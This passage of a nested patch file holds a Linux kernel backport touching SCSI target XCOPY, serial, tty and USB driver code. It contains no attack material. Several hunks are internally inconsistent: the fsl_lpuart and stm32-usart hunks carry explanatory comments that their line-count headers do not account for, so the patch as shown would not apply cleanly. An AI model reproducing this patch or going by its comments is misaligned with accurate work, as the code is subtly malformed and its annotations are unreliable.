+-	while (src_lba < end_lba) {
+-		unsigned short cur_nolb = min(nolb, max_nolb);
+-		u32 cur_bytes = cur_nolb * src_dev->dev_attrib.block_size;
++	while (nolb) {
++		u32 cur_bytes = min_t(u64, max_bytes, nolb * src_dev->dev_attrib.block_size);
++		unsigned short cur_nolb = cur_bytes / src_dev->dev_attrib.block_size;
+ 
+ 		if (cur_bytes != xop->xop_data_bytes) {
+ 			/*
+@@ -724,43 +722,43 @@ static void target_xcopy_do_work(struct work_struct *work)
+ 			xop->xop_data_bytes = cur_bytes;
+ 		}
+ 
+-		pr_debug("target_xcopy_do_work: Calling read src_dev: %p src_lba: %llu,"
+-			" cur_nolb: %hu\n", src_dev, (unsigned long long)src_lba, cur_nolb);
++		pr_debug("%s: Calling read src_dev: %p src_lba: %llu, cur_nolb: %hu\n",
++				__func__, src_dev, (unsigned long long)src_lba, cur_nolb);
+ 
+-		rc = target_xcopy_read_source(ec_cmd, xop, src_dev, src_lba, cur_nolb);
++		rc = target_xcopy_read_source(ec_cmd, xop, src_dev, src_lba, cur_bytes);
+ 		if (rc < 0)
+ 			goto out;
+ 
+-		src_lba += cur_nolb;
+-		pr_debug("target_xcopy_do_work: Incremented READ src_lba to %llu\n",
++		src_lba += cur_bytes / src_dev->dev_attrib.block_size;
++		pr_debug("%s: Incremented READ src_lba to %llu\n", __func__,
+ 				(unsigned long long)src_lba);
+ 
+-		pr_debug("target_xcopy_do_work: Calling write dst_dev: %p dst_lba: %llu,"
+-			" cur_nolb: %hu\n", dst_dev, (unsigned long long)dst_lba, cur_nolb);
++		pr_debug("%s: Calling write dst_dev: %p dst_lba: %llu, cur_nolb: %u\n",
++				__func__, dst_dev, (unsigned long long)dst_lba, cur_nolb);
+ 
+ 		rc = target_xcopy_write_destination(ec_cmd, xop, dst_dev,
+-						dst_lba, cur_nolb);
++						dst_lba, cur_bytes);
+ 		if (rc < 0)
+ 			goto out;
+ 
+-		dst_lba += cur_nolb;
+-		pr_debug("target_xcopy_do_work: Incremented WRITE dst_lba to %llu\n",
++		dst_lba += cur_bytes / dst_dev->dev_attrib.block_size;
++		pr_debug("%s: Incremented WRITE dst_lba to %llu\n", __func__,
+ 				(unsigned long long)dst_lba);
+ 
+-		copied_nolb += cur_nolb;
+-		nolb -= cur_nolb;
++		copied_bytes += cur_bytes;
++		nolb -= cur_bytes / src_dev->dev_attrib.block_size;
+ 	}
+ 
+ 	xcopy_pt_undepend_remotedev(xop);
+ 	target_free_sgl(xop->xop_data_sg, xop->xop_data_nents);
+ 	kfree(xop);
+ 
+-	pr_debug("target_xcopy_do_work: Final src_lba: %llu, dst_lba: %llu\n",
++	pr_debug("%s: Final src_lba: %llu, dst_lba: %llu\n", __func__,
+ 		(unsigned long long)src_lba, (unsigned long long)dst_lba);
+-	pr_debug("target_xcopy_do_work: Blocks copied: %hu, Bytes Copied: %u\n",
+-		copied_nolb, copied_nolb * dst_dev->dev_attrib.block_size);
++	pr_debug("%s: Blocks copied: %u, Bytes Copied: %u\n", __func__,
++		copied_bytes / dst_dev->dev_attrib.block_size, copied_bytes);
+ 
+-	pr_debug("target_xcopy_do_work: Setting X-COPY GOOD status -> sending response\n");
++	pr_debug("%s: Setting X-COPY GOOD status -> sending response\n", __func__);
+ 	target_complete_cmd(ec_cmd, SAM_STAT_GOOD);
+ 	return;
+ 
+@@ -776,8 +774,8 @@ out:
+ 
+ err_free:
+ 	kfree(xop);
+-	pr_warn_ratelimited("target_xcopy_do_work: rc: %d, sense: %u, XCOPY operation failed\n",
+-			   rc, sense_rc);
++	pr_warn_ratelimited("%s: rc: %d, sense: %u, XCOPY operation failed\n",
++			   __func__, rc, sense_rc);
+ 	target_complete_cmd_with_sense(ec_cmd, SAM_STAT_CHECK_CONDITION, sense_rc);
+ }
+ 
+diff --git a/drivers/target/target_core_xcopy.h b/drivers/target/target_core_xcopy.h
+index e5f20005179a8..0aad7dc658955 100644
+--- a/drivers/target/target_core_xcopy.h
++++ b/drivers/target/target_core_xcopy.h
+@@ -5,7 +5,7 @@
+ #define XCOPY_TARGET_DESC_LEN		32
+ #define XCOPY_SEGMENT_DESC_LEN		28
+ #define XCOPY_NAA_IEEE_REGEX_LEN	16
+-#define XCOPY_MAX_SECTORS		4096
++#define XCOPY_MAX_BYTES			16777216 /* 16 MB */
+ 
+ /*
+  * SPC4r37 6.4.6.1
+diff --git a/drivers/thermal/mtk_thermal.c b/drivers/thermal/mtk_thermal.c
+index 8440692e3890d..62f1e691659e3 100644
+--- a/drivers/thermal/mtk_thermal.c
++++ b/drivers/thermal/mtk_thermal.c
+@@ -1028,7 +1028,12 @@ static int mtk_thermal_probe(struct platform_device *pdev)
+ 		return -ENODEV;
+ 	}
+ 
+-	auxadc_base = of_iomap(auxadc, 0);
++	auxadc_base = devm_of_iomap(&pdev->dev, auxadc, 0, NULL);
++	if (IS_ERR(auxadc_base)) {
++		of_node_put(auxadc);
++		return PTR_ERR(auxadc_base);
++	}
++
+ 	auxadc_phys_base = of_get_phys_base(auxadc);
+ 
+ 	of_node_put(auxadc);
+@@ -1044,7 +1049,12 @@ static int mtk_thermal_probe(struct platform_device *pdev)
+ 		return -ENODEV;
+ 	}
+ 
+-	apmixed_base = of_iomap(apmixedsys, 0);
++	apmixed_base = devm_of_iomap(&pdev->dev, apmixedsys, 0, NULL);
++	if (IS_ERR(apmixed_base)) {
++		of_node_put(apmixedsys);
++		return PTR_ERR(apmixed_base);
++	}
++
+ 	apmixed_phys_base = of_get_phys_base(apmixedsys);
+ 
+ 	of_node_put(apmixedsys);
+diff --git a/drivers/thunderbolt/tb.h b/drivers/thunderbolt/tb.h
+index f034723b1b40e..f79cae48a8eab 100644
+--- a/drivers/thunderbolt/tb.h
++++ b/drivers/thunderbolt/tb.h
+@@ -1058,7 +1058,7 @@ void tb_port_lane_bonding_disable(struct tb_port *port);
+ int tb_port_wait_for_link_width(struct tb_port *port, int width,
+ 				int timeout_msec);
+ int tb_port_update_credits(struct tb_port *port);
+-bool tb_port_is_clx_enabled(struct tb_port *port, enum tb_clx clx);
++bool tb_port_is_clx_enabled(struct tb_port *port, unsigned int clx);
+ 
+ int tb_switch_find_vse_cap(struct tb_switch *sw, enum tb_switch_vse_cap vsec);
+ int tb_switch_find_cap(struct tb_switch *sw, enum tb_switch_cap cap);
+diff --git a/drivers/tty/serial/8250/8250.h b/drivers/tty/serial/8250/8250.h
+index 287153d325365..1e8fe44a7099f 100644
+--- a/drivers/tty/serial/8250/8250.h
++++ b/drivers/tty/serial/8250/8250.h
+@@ -365,6 +365,13 @@ static inline void serial8250_do_prepare_rx_dma(struct uart_8250_port *p)
+ 	if (dma->prepare_rx_dma)
+ 		dma->prepare_rx_dma(p);
+ }
++
++static inline bool serial8250_tx_dma_running(struct uart_8250_port *p)
++{
++	struct uart_8250_dma *dma = p->dma;
++
++	return dma && dma->tx_running;
++}
+ #else
+ static inline int serial8250_tx_dma(struct uart_8250_port *p)
+ {
+@@ -380,6 +387,11 @@ static inline int serial8250_request_dma(struct uart_8250_port *p)
+ 	return -1;
+ }
+ static inline void serial8250_release_dma(struct uart_8250_port *p) { }
++
++static inline bool serial8250_tx_dma_running(struct uart_8250_port *p)
++{
++	return false;
++}
+ #endif
+ 
+ static inline int ns16550a_goto_highspeed(struct uart_8250_port *up)
+diff --git a/drivers/tty/serial/8250/8250_bcm7271.c b/drivers/tty/serial/8250/8250_bcm7271.c
+index 89bfcefbea848..36e31b96ef4a5 100644
+--- a/drivers/tty/serial/8250/8250_bcm7271.c
++++ b/drivers/tty/serial/8250/8250_bcm7271.c
+@@ -1016,14 +1016,16 @@ static int brcmuart_probe(struct platform_device *pdev)
+ 	/* See if a Baud clock has been specified */
+ 	baud_mux_clk = of_clk_get_by_name(np, "sw_baud");
+ 	if (IS_ERR(baud_mux_clk)) {
+-		if (PTR_ERR(baud_mux_clk) == -EPROBE_DEFER)
+-			return -EPROBE_DEFER;
++		if (PTR_ERR(baud_mux_clk) == -EPROBE_DEFER) {
++			ret = -EPROBE_DEFER;
++			goto release_dma;
++		}
+ 		dev_dbg(dev, "BAUD MUX clock not specified\n");
+ 	} else {
+ 		dev_dbg(dev, "BAUD MUX clock found\n");
+ 		ret = clk_prepare_enable(baud_mux_clk);
+ 		if (ret)
+-			return ret;
++			goto release_dma;
+ 		priv->baud_mux_clk = baud_mux_clk;
+ 		init_real_clk_rates(dev, priv);
+ 		clk_rate = priv->default_mux_rate;
+@@ -1031,7 +1033,8 @@ static int brcmuart_probe(struct platform_device *pdev)
+ 
+ 	if (clk_rate == 0) {
+ 		dev_err(dev, "clock-frequency or clk not defined\n");
+-		return -EINVAL;
++		ret = -EINVAL;
++		goto release_dma;
+ 	}
+ 
+ 	dev_dbg(dev, "DMA is %senabled\n", priv->dma_enabled ? "" : "not ");
+@@ -1118,7 +1121,9 @@ err1:
+ 	serial8250_unregister_port(priv->line);
+ err:
+ 	brcmuart_free_bufs(dev, priv);
+-	brcmuart_arbitration(priv, 0);
++release_dma:
++	if (priv->dma_enabled)
++		brcmuart_arbitration(priv, 0);
+ 	return ret;
+ }
+ 
+@@ -1130,7 +1135,8 @@ static int brcmuart_remove(struct platform_device *pdev)
+ 	hrtimer_cancel(&priv->hrt);
+ 	serial8250_unregister_port(priv->line);
+ 	brcmuart_free_bufs(&pdev->dev, priv);
+-	brcmuart_arbitration(priv, 0);
++	if (priv->dma_enabled)
++		brcmuart_arbitration(priv, 0);
+ 	return 0;
+ }
+ 
+diff --git a/drivers/tty/serial/8250/8250_port.c b/drivers/tty/serial/8250/8250_port.c
+index 2a3bd6918c77e..b8e8a96c3eb63 100644
+--- a/drivers/tty/serial/8250/8250_port.c
++++ b/drivers/tty/serial/8250/8250_port.c
+@@ -15,6 +15,7 @@
+ #include <linux/moduleparam.h>
+ #include <linux/ioport.h>
+ #include <linux/init.h>
++#include <linux/irq.h>
+ #include <linux/console.h>
+ #include <linux/gpio/consumer.h>
+ #include <linux/sysrq.h>
+@@ -1926,6 +1927,7 @@ static bool handle_rx_dma(struct uart_8250_port *up, unsigned int iir)
+ int serial8250_handle_irq(struct uart_port *port, unsigned int iir)
+ {
+ 	struct uart_8250_port *up = up_to_u8250p(port);
++	struct tty_port *tport = &port->state->port;
+ 	bool skip_rx = false;
+ 	unsigned long flags;
+ 	u16 status;
+@@ -1951,6 +1953,8 @@ int serial8250_handle_irq(struct uart_port *port, unsigned int iir)
+ 		skip_rx = true;
+ 
+ 	if (status & (UART_LSR_DR | UART_LSR_BI) && !skip_rx) {
++		if (irqd_is_wakeup_set(irq_get_irq_data(port->irq)))
++			pm_wakeup_event(tport->tty->dev, 0);
+ 		if (!up->dma || handle_rx_dma(up, iir))
+ 			status = serial8250_rx_chars(up, status);
+ 	}
+@@ -2010,18 +2014,19 @@ static int serial8250_tx_threshold_handle_irq(struct uart_port *port)
+ static unsigned int serial8250_tx_empty(struct uart_port *port)
+ {
+ 	struct uart_8250_port *up = up_to_u8250p(port);
++	unsigned int result = 0;
+ 	unsigned long flags;
+-	u16 lsr;
+ 
+ 	serial8250_rpm_get(up);
+ 
+ 	spin_lock_irqsave(&port->lock, flags);
+-	lsr = serial_lsr_in(up);
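++	/*
++	 * The FIFO can drain while a TX DMA transfer still has data queued,
++	 * so only report TEMT once DMA is idle as well.
++	 */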
++	if (!serial8250_tx_dma_running(up) && uart_lsr_tx_empty(serial_lsr_in(up)))
++		result = TIOCSER_TEMT;
+ 	spin_unlock_irqrestore(&port->lock, flags);
+ 
+ 	serial8250_rpm_put(up);
+ 
+-	return uart_lsr_tx_empty(lsr) ? TIOCSER_TEMT : 0;
++	return result;
+ }
+ 
+ unsigned int serial8250_do_get_mctrl(struct uart_port *port)
+diff --git a/drivers/tty/serial/fsl_lpuart.c b/drivers/tty/serial/fsl_lpuart.c
+index 48eb5fea62fd0..81467e93c7d53 100644
+--- a/drivers/tty/serial/fsl_lpuart.c
++++ b/drivers/tty/serial/fsl_lpuart.c
+@@ -1276,7 +1276,7 @@ static inline int lpuart_start_rx_dma(struct lpuart_port *sport)
+ 	 * 10ms at any baud rate.
+ 	 */
+ 	sport->rx_dma_rng_buf_len = (DMA_RX_TIMEOUT * baud /  bits / 1000) * 2;
+-	sport->rx_dma_rng_buf_len = (1 << (fls(sport->rx_dma_rng_buf_len) - 1));
++	sport->rx_dma_rng_buf_len = (1 << fls(sport->rx_dma_rng_buf_len));
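++	/*
++	 * 1 << fls(x) yields a power-of-two size no smaller than x; the
++	 * previous (fls(x) - 1) variant could round the length down.
++	 */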
+ 	if (sport->rx_dma_rng_buf_len < 16)
+ 		sport->rx_dma_rng_buf_len = 16;
+ 
+diff --git a/drivers/tty/serial/max310x.c b/drivers/tty/serial/max310x.c
+index fbf6e2b3161c5..338cb19dec23c 100644
+--- a/drivers/tty/serial/max310x.c
++++ b/drivers/tty/serial/max310x.c
+@@ -525,6 +525,11 @@ static bool max310x_reg_precious(struct device *dev, unsigned int reg)
+ 	return false;
+ }
+ 
++static bool max310x_reg_noinc(struct device *dev, unsigned int reg)
++{
++	return reg == MAX310X_RHR_REG;
++}
++
+ static int max310x_set_baud(struct uart_port *port, int baud)
+ {
+ 	unsigned int mode = 0, div = 0, frac = 0, c = 0, F = 0;
+@@ -651,14 +656,14 @@ static void max310x_batch_write(struct uart_port *port, u8 *txbuf, unsigned int
+ {
+ 	struct max310x_one *one = to_max310x_port(port);
+ 
+-	regmap_raw_write(one->regmap, MAX310X_THR_REG, txbuf, len);
++	regmap_noinc_write(one->regmap, MAX310X_THR_REG, txbuf, len);
+ }
+ 
+ static void max310x_batch_read(struct uart_port *port, u8 *rxbuf, unsigned int len)
+ {
+ 	struct max310x_one *one = to_max310x_port(port);
+ 
+-	regmap_raw_read(one->regmap, MAX310X_RHR_REG, rxbuf, len);
++	regmap_noinc_read(one->regmap, MAX310X_RHR_REG, rxbuf, len);
+ }
+ 
+ static void max310x_handle_rx(struct uart_port *port, unsigned int rxlen)
+@@ -1472,6 +1477,10 @@ static struct regmap_config regcfg = {
+ 	.writeable_reg = max310x_reg_writeable,
+ 	.volatile_reg = max310x_reg_volatile,
+ 	.precious_reg = max310x_reg_precious,
++	.writeable_noinc_reg = max310x_reg_noinc,
++	.readable_noinc_reg = max310x_reg_noinc,
++	.max_raw_read = MAX310X_FIFO_SIZE,
++	.max_raw_write = MAX310X_FIFO_SIZE,
+ };
+ 
+ #ifdef CONFIG_SPI_MASTER
+@@ -1557,6 +1566,10 @@ static struct regmap_config regcfg_i2c = {
+ 	.volatile_reg = max310x_reg_volatile,
+ 	.precious_reg = max310x_reg_precious,
+ 	.max_register = MAX310X_I2C_REVID_EXTREG,
++	.writeable_noinc_reg = max310x_reg_noinc,
++	.readable_noinc_reg = max310x_reg_noinc,
++	.max_raw_read = MAX310X_FIFO_SIZE,
++	.max_raw_write = MAX310X_FIFO_SIZE,
+ };
+ 
+ static const struct max310x_if_cfg max310x_i2c_if_cfg = {
+diff --git a/drivers/tty/serial/serial_core.c b/drivers/tty/serial/serial_core.c
+index 179ee199df343..23a7ab0de4445 100644
+--- a/drivers/tty/serial/serial_core.c
++++ b/drivers/tty/serial/serial_core.c
+@@ -1552,7 +1552,7 @@ uart_ioctl(struct tty_struct *tty, unsigned int cmd, unsigned long arg)
+ 		goto out;
+ 
+ 	/* rs485_config requires more locking than others */
+-	if (cmd == TIOCGRS485)
++	if (cmd == TIOCSRS485)
+ 		down_write(&tty->termios_rwsem);
+ 
+ 	mutex_lock(&port->mutex);
+@@ -1595,7 +1595,7 @@ uart_ioctl(struct tty_struct *tty, unsigned int cmd, unsigned long arg)
+ 	}
+ out_up:
+ 	mutex_unlock(&port->mutex);
+-	if (cmd == TIOCGRS485)
++	if (cmd == TIOCSRS485)
+ 		up_write(&tty->termios_rwsem);
+ out:
+ 	return ret;
+diff --git a/drivers/tty/serial/stm32-usart.c b/drivers/tty/serial/stm32-usart.c
+index 0e6ef24419c8e..28edbaf7bb329 100644
+--- a/drivers/tty/serial/stm32-usart.c
++++ b/drivers/tty/serial/stm32-usart.c
+@@ -690,8 +690,9 @@ static void stm32_usart_transmit_chars(struct uart_port *port)
+ 	int ret;
+ 
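++	/*
++	 * Only switch the RS485 transceiver to transmit (RTS) when there is
++	 * actually something to send: an x_char, or a queue that is neither
++	 * empty nor stopped.
++	 */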
+ 	if (!stm32_port->hw_flow_control &&
+-	    port->rs485.flags & SER_RS485_ENABLED) {
+-		stm32_port->txdone = false;
++	    port->rs485.flags & SER_RS485_ENABLED &&
++	    (port->x_char ||
++	     !(uart_circ_empty(xmit) || uart_tx_stopped(port)))) {
+ 		stm32_usart_tc_interrupt_disable(port);
+ 		stm32_usart_rs485_rts_enable(port);
+ 	}
+diff --git a/drivers/tty/tty.h b/drivers/tty/tty.h
+index 1c08c9b67b16c..c5ee219127555 100644
+--- a/drivers/tty/tty.h
++++ b/drivers/tty/tty.h
+@@ -62,6 +62,8 @@ int __tty_check_change(struct tty_struct *tty, int sig);
+ int tty_check_change(struct tty_struct *tty);
+ void __stop_tty(struct tty_struct *tty);
+ void __start_tty(struct tty_struct *tty);
++void tty_write_unlock(struct tty_struct *tty);
++int tty_write_lock(struct tty_struct *tty, int ndelay);
+ void tty_vhangup_session(struct tty_struct *tty);
+ void tty_open_proc_set_tty(struct file *filp, struct tty_struct *tty);
+ int tty_signal_session_leader(struct tty_struct *tty, int exit_session);
+diff --git a/drivers/tty/tty_io.c b/drivers/tty/tty_io.c
+index 1ac6784ea1f92..8fb6c6853556a 100644
+--- a/drivers/tty/tty_io.c
++++ b/drivers/tty/tty_io.c
+@@ -933,13 +933,13 @@ static ssize_t tty_read(struct kiocb *iocb, struct iov_iter *to)
+ 	return i;
+ }
+ 
+-static void tty_write_unlock(struct tty_struct *tty)
++void tty_write_unlock(struct tty_struct *tty)
+ {
+ 	mutex_unlock(&tty->atomic_write_lock);
+ 	wake_up_interruptible_poll(&tty->write_wait, EPOLLOUT);
+ }
+ 
+-static int tty_write_lock(struct tty_struct *tty, int ndelay)
++int tty_write_lock(struct tty_struct *tty, int ndelay)
+ {
+ 	if (!mutex_trylock(&tty->atomic_write_lock)) {
+ 		if (ndelay)
+diff --git a/drivers/tty/tty_ioctl.c b/drivers/tty/tty_ioctl.c
+index ce511557b98b1..ad1cf51ecd11d 100644
+--- a/drivers/tty/tty_ioctl.c
++++ b/drivers/tty/tty_ioctl.c
+@@ -500,21 +500,42 @@ static int set_termios(struct tty_struct *tty, void __user *arg, int opt)
+ 	tmp_termios.c_ispeed = tty_termios_input_baud_rate(&tmp_termios);
+ 	tmp_termios.c_ospeed = tty_termios_baud_rate(&tmp_termios);
+ 
+-	ld = tty_ldisc_ref(tty);
++	if (opt & (TERMIOS_FLUSH|TERMIOS_WAIT)) {
++retry_write_wait:
++		retval = wait_event_interruptible(tty->write_wait, !tty_chars_in_buffer(tty));
++		if (retval < 0)
++			return retval;
+ 
+-	if (ld != NULL) {
+-		if ((opt & TERMIOS_FLUSH) && ld->ops->flush_buffer)
+-			ld->ops->flush_buffer(tty);
+-		tty_ldisc_deref(ld);
+-	}
++		if (tty_write_lock(tty, 0) < 0)
++			goto retry_write_wait;
+ 
+-	if (opt & TERMIOS_WAIT) {
+-		tty_wait_until_sent(tty, 0);
+-		if (signal_pending(current))
+-			return -ERESTARTSYS;
+-	}
++		/* Racing writer? */
++		if (tty_chars_in_buffer(tty)) {
++			tty_write_unlock(tty);
++			goto retry_write_wait;
++		}
+ 
+-	tty_set_termios(tty, &tmp_termios);
++		ld = tty_ldisc_ref(tty);
++		if (ld != NULL) {
++			if ((opt & TERMIOS_FLUSH) && ld->ops->flush_buffer)
++				ld->ops->flush_buffer(tty);
++			tty_ldisc_deref(ld);
++		}
++
++		if ((opt & TERMIOS_WAIT) && tty->ops->wait_until_sent) {
++			tty->ops->wait_until_sent(tty, 0);
++			if (signal_pending(current)) {
++				tty_write_unlock(tty);
++				return -ERESTARTSYS;
++			}
++		}
++
++		tty_set_termios(tty, &tmp_termios);
++
++		tty_write_unlock(tty);
++	} else {
++		tty_set_termios(tty, &tmp_termios);
++	}
+ 
+ 	/* FIXME: Arguably if tmp_termios == tty->termios AND the
+ 	   actual requested termios was not tmp_termios then we may
+diff --git a/drivers/usb/chipidea/core.c b/drivers/usb/chipidea/core.c
+index 5abdc2b0f506d..71f172ecfaabc 100644
+--- a/drivers/usb/chipidea/core.c
++++ b/drivers/usb/chipidea/core.c
+@@ -1101,7 +1101,7 @@ static int ci_hdrc_probe(struct platform_device *pdev)
+ 	ret = ci_usb_phy_init(ci);
+ 	if (ret) {
+ 		dev_err(dev, "unable to init phy: %d\n", ret);
+-		return ret;
++		goto ulpi_exit;
+ 	}
+ 
+ 	ci->hw_bank.phys = res->start;
+diff --git a/drivers/usb/dwc3/core.c b/drivers/usb/dwc3/core.c
+index 476b636185116..9f8c988c25cb1 100644
+--- a/drivers/usb/dwc3/core.c
++++ b/drivers/usb/dwc3/core.c
+@@ -1883,13 +1883,11 @@ static int dwc3_probe(struct platform_device *pdev)
+ 	spin_lock_init(&dwc->lock);
+ 	mutex_init(&dwc->mutex);
+ 
++	pm_runtime_get_noresume(dev);
+ 	pm_runtime_set_active(dev);
+ 	pm_runtime_use_autosuspend(dev);
+ 	pm_runtime_set_autosuspend_delay(dev, DWC3_DEFAULT_AUTOSUSPEND_DELAY);
+ 	pm_runtime_enable(dev);
+-	ret = pm_runtime_get_sync(dev);
+-	if (ret < 0)
+-		goto err1;
+ 
+ 	pm_runtime_forbid(dev);
+ 
+@@ -1954,12 +1952,10 @@ err3:
+ 	dwc3_free_event_buffers(dwc);
+ 
+ err2:
+-	pm_runtime_allow(&pdev->dev);
+-
+-err1:
+-	pm_runtime_put_sync(&pdev->dev);
+-	pm_runtime_disable(&pdev->dev);
+-
++	pm_runtime_allow(dev);
++	pm_runtime_disable(dev);
++	pm_runtime_set_suspended(dev);
++	pm_runtime_put_noidle(dev);
+ disable_clks:
+ 	dwc3_clk_disable(dwc);
+ assert_reset:
+@@ -1983,6 +1979,7 @@ static int dwc3_remove(struct platform_device *pdev)
+ 	dwc3_core_exit(dwc);
+ 	dwc3_ulpi_exit(dwc);
+ 
++	pm_runtime_allow(&pdev->dev);
+ 	pm_runtime_disable(&pdev->dev);
+ 	pm_runtime_put_noidle(&pdev->dev);
+ 	pm_runtime_set_suspended(&pdev->dev);
+diff --git a/drivers/usb/dwc3/gadget.c b/drivers/usb/dwc3/gadget.c
+index 5997d7f943fec..d2622378ce040 100644
+--- a/drivers/usb/dwc3/gadget.c
++++ b/drivers/usb/dwc3/gadget.c
+@@ -2522,29 +2522,17 @@ static int __dwc3_gadget_start(struct dwc3 *dwc);
+ static int dwc3_gadget_soft_disconnect(struct dwc3 *dwc)
+ {
+ 	unsigned long flags;
++	int ret;
+ 
+ 	spin_lock_irqsave(&dwc->lock, flags);
+ 	dwc->connected = false;
+ 
+ 	/*
+-	 * Per databook, when we want to stop the gadget, if a control transfer
+-	 * is still in process, complete it and get the core into setup phase.
++	 * Attempt to end pending SETUP status phase, and not wait for the
++	 * function to do so.
+ 	 */
+-	if (dwc->ep0state != EP0_SETUP_PHASE) {
+-		int ret;
+-
+-		if (dwc->delayed_status)
+-			dwc3_ep0_send_delayed_status(dwc);
+-
+-		reinit_completion(&dwc->ep0_in_setup);
+-
+-		spin_unlock_irqrestore(&dwc->lock, flags);
+-		ret = wait_for_completion_timeout(&dwc->ep0_in_setup,
+-				msecs_to_jiffies(DWC3_PULL_UP_TIMEOUT));
+-		spin_lock_irqsave(&dwc->lock, flags);
+-		if (ret == 0)
+-			dev_warn(dwc->dev, "timed out waiting for SETUP phase\n");
+-	}
++	if (dwc->delayed_status)
++		dwc3_ep0_send_delayed_status(dwc);
+ 
+ 	/*
+ 	 * In the Synopsys DesignWare Cores USB3 Databook Rev. 3.30a
+@@ -2557,6 +2545,33 @@ static int dwc3_gadget_soft_disconnect(struct dwc3 *dwc)
+ 	__dwc3_gadget_stop(dwc);
+ 	spin_unlock_irqrestore(&dwc->lock, flags);
+ 
++	/*
++	 * Per databook, when we want to stop the gadget, if a control transfer
++	 * is still in process, complete it and get the core into setup phase.
++	 * In case the host is unresponsive to a SETUP transaction, forcefully
++	 * stall the transfer, and move back to the SETUP phase, so that any
++	 * pending endxfers can be executed.
++	 */
++	if (dwc->ep0state != EP0_SETUP_PHASE) {
++		reinit_completion(&dwc->ep0_in_setup);
++
++		ret = wait_for_completion_timeout(&dwc->ep0_in_setup,
++				msecs_to_jiffies(DWC3_PULL_UP_TIMEOUT));
++		if (ret == 0) {
++			unsigned int dir;
++
++			dev_warn(dwc->dev, "wait for SETUP phase timed out\n");
++			spin_lock_irqsave(&dwc->lock, flags);
++			dir = !!dwc->ep0_expect_in;
++			if (dwc->ep0state == EP0_DATA_PHASE)
++				dwc3_ep0_end_control_data(dwc, dwc->eps[dir]);
++			else
++				dwc3_ep0_end_control_data(dwc, dwc->eps[!dir]);
++			dwc3_ep0_stall_and_restart(dwc);
++			spin_unlock_irqrestore(&dwc->lock, flags);
++		}
++	}
++
+ 	/*
+ 	 * Note: if the GEVNTCOUNT indicates events in the event buffer, the
+ 	 * driver needs to acknowledge them before the controller can halt.
+@@ -4237,15 +4252,8 @@ static void dwc3_gadget_interrupt(struct dwc3 *dwc,
+ 		break;
+ 	case DWC3_DEVICE_EVENT_SUSPEND:
+ 		/* It changed to be suspend event for version 2.30a and above */
+-		if (!DWC3_VER_IS_PRIOR(DWC3, 230A)) {
+-			/*
+-			 * Ignore suspend event until the gadget enters into
+-			 * USB_STATE_CONFIGURED state.
+-			 */
+-			if (dwc->gadget->state >= USB_STATE_CONFIGURED)
+-				dwc3_gadget_suspend_interrupt(dwc,
+-						event->event_info);
+-		}
++		if (!DWC3_VER_IS_PRIOR(DWC3, 230A))
++			dwc3_gadget_suspend_interrupt(dwc, event->event_info);
+ 		break;
+ 	case DWC3_DEVICE_EVENT_SOF:
+ 	case DWC3_DEVICE_EVENT_ERRATIC_ERROR:
+diff --git a/drivers/usb/gadget/function/f_tcm.c b/drivers/usb/gadget/function/f_tcm.c
+index 658e2e21fdd0d..c21acebe8aae5 100644
+--- a/drivers/usb/gadget/function/f_tcm.c
++++ b/drivers/usb/gadget/function/f_tcm.c
+@@ -1054,7 +1054,7 @@ static void usbg_cmd_work(struct work_struct *work)
+ 				  tv_nexus->tvn_se_sess->se_tpg->se_tpg_tfo,
+ 				  tv_nexus->tvn_se_sess, cmd->data_len, DMA_NONE,
+ 				  cmd->prio_attr, cmd->sense_iu.sense,
+-				  cmd->unpacked_lun);
++				  cmd->unpacked_lun, NULL);
+ 		goto out;
+ 	}
+ 
+@@ -1183,7 +1183,7 @@ static void bot_cmd_work(struct work_struct *work)
+ 				  tv_nexus->tvn_se_sess->se_tpg->se_tpg_tfo,
+ 				  tv_nexus->tvn_se_sess, cmd->data_len, DMA_NONE,
+ 				  cmd->prio_attr, cmd->sense_iu.sense,
+-				  cmd->unpacked_lun);
++				  cmd->unpacked_lun, NULL);
+ 		goto out;
+ 	}
+ 
+diff --git a/drivers/usb/gadget/udc/core.c b/drivers/usb/gadget/udc/core.c
+index bf9878e1a72a8..e85706812d61e 100644
+--- a/drivers/usb/gadget/udc/core.c
++++ b/drivers/usb/gadget/udc/core.c
+@@ -37,6 +37,10 @@ static struct bus_type gadget_bus_type;
+  * @vbus: for udcs who care about vbus status, this value is real vbus status;
+  * for udcs who do not care about vbus status, this value is always true
+  * @started: the UDC's started state. True if the UDC had started.
++ * @connect_lock: protects udc->vbus, udc->started and the gadget->connect /
++ * gadget->deactivate related functions. usb_gadget_connect_locked,
++ * usb_gadget_disconnect_locked, usb_udc_connect_control_locked,
++ * usb_gadget_udc_start_locked and usb_gadget_udc_stop_locked are called
++ * with this lock held.
+  *
+  * This represents the internal data structure which is used by the UDC-class
+  * to hold information about udc driver and gadget together.
+@@ -48,6 +52,7 @@ struct usb_udc {
+ 	struct list_head		list;
+ 	bool				vbus;
+ 	bool				started;
++	struct mutex			connect_lock;
+ };
+ 
+ static struct class *udc_class;
+@@ -660,17 +665,9 @@ out:
+ }
+ EXPORT_SYMBOL_GPL(usb_gadget_vbus_disconnect);
+ 
+-/**
+- * usb_gadget_connect - software-controlled connect to USB host
+- * @gadget:the peripheral being connected
+- *
+- * Enables the D+ (or potentially D-) pullup.  The host will start
+- * enumerating this gadget when the pullup is active and a VBUS session
+- * is active (the link is powered).
+- *
+- * Returns zero on success, else negative errno.
+- */
+-int usb_gadget_connect(struct usb_gadget *gadget)
++/* Internal version of usb_gadget_connect needs to be called with connect_lock held. */
++static int usb_gadget_connect_locked(struct usb_gadget *gadget)
++	__must_hold(&gadget->udc->connect_lock)
+ {
+ 	int ret = 0;
+ 
+@@ -679,10 +676,15 @@ int usb_gadget_connect(struct usb_gadget *gadget)
+ 		goto out;
+ 	}
+ 
+-	if (gadget->deactivated) {
++	if (gadget->connected)
++		goto out;
++
++	if (gadget->deactivated || !gadget->udc->started) {
+ 		/*
+ 		 * If gadget is deactivated we only save new state.
+ 		 * Gadget will be connected automatically after activation.
++		 *
++		 * udc first needs to be started before the gadget can be pulled up.
+ 		 */
+ 		gadget->connected = true;
+ 		goto out;
+@@ -697,22 +699,32 @@ out:
+ 
+ 	return ret;
+ }
+-EXPORT_SYMBOL_GPL(usb_gadget_connect);
+ 
+ /**
+- * usb_gadget_disconnect - software-controlled disconnect from USB host
+- * @gadget:the peripheral being disconnected
+- *
+- * Disables the D+ (or potentially D-) pullup, which the host may see
+- * as a disconnect (when a VBUS session is active).  Not all systems
+- * support software pullup controls.
++ * usb_gadget_connect - software-controlled connect to USB host
++ * @gadget:the peripheral being connected
+  *
+- * Following a successful disconnect, invoke the ->disconnect() callback
